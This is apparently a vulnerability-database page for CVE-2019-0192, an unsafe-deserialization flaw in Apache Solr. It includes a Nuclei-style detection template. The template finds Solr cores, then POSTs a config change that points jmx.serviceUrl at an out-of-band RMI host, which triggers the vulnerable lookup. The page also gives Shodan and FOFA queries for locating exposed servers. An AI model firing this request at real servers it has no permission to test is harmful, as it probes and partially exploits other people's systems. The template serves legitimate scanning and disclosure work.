CVE-2019-0192: Apache Solr - Deserialization of Untrusted Data

2025-08-01 Apache Solr PoC Public

Description

In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.

PoC

id: CVE-2019-0192

info:
  name: Apache Solr - Deserialization of Untrusted Data
  author: hnd3884
  severity: critical
  description: |
    In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API allows to configure the JMX server via an HTTP POST request. By pointing it to a malicious RMI server, an attacker could take advantage of Solr's unsafe deserialization to trigger remote code execution on the Solr side.
  impact: |
    Unauthenticated attackers can trigger remote code execution via unsafe deserialization by pointing the JMX server to a malicious RMI server, leading to complete Solr server compromise.
  remediation: |
    Upgrade to Apache Solr version 5.5.6, 6.6.6, or later versions that are not vulnerable.
  reference:
    - https://github.com/Imanfeng/Apache-Solr-RCE
    - https://nvd.nist.gov/vuln/detail/CVE-2019-0192
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-0192
    cwe-id: CWE-502
    epss-score: 0.77508
    epss-percentile: 0.99536
    cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: apache
    product: solr
    shodan-query: title:"Solr"
    fofa-query: title="Solr
  tags: cve,cve2019,apache,solr,deserialization,rce,oast,vkev,vuln

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /solr/admin/cores?wt=json HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: json
        name: core_name
        json:
          - '.status | .[].name'
        internal: true

  - raw:
      - |
        POST /solr/{{core_name}}/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"set-property":{"jmx.serviceUrl":"service:jmx:rmi:///jndi/rmi://{{interactsh-url}}/obj"}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
          - 'contains(body, "javax.management.remote.rmi")'
          - 'contains(content_type, "text/plain")'
          - 'status_code == 500'
        condition: and
# digest: 4a0a004730450220551f431e16b139cd5edada262aafbcf7e13c4164987f37fe3f7140f5e89b56be02210096017c91a402be71fb71e0364617ec3e6028ae7069f3a2cc6754cf8e148fb37d:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities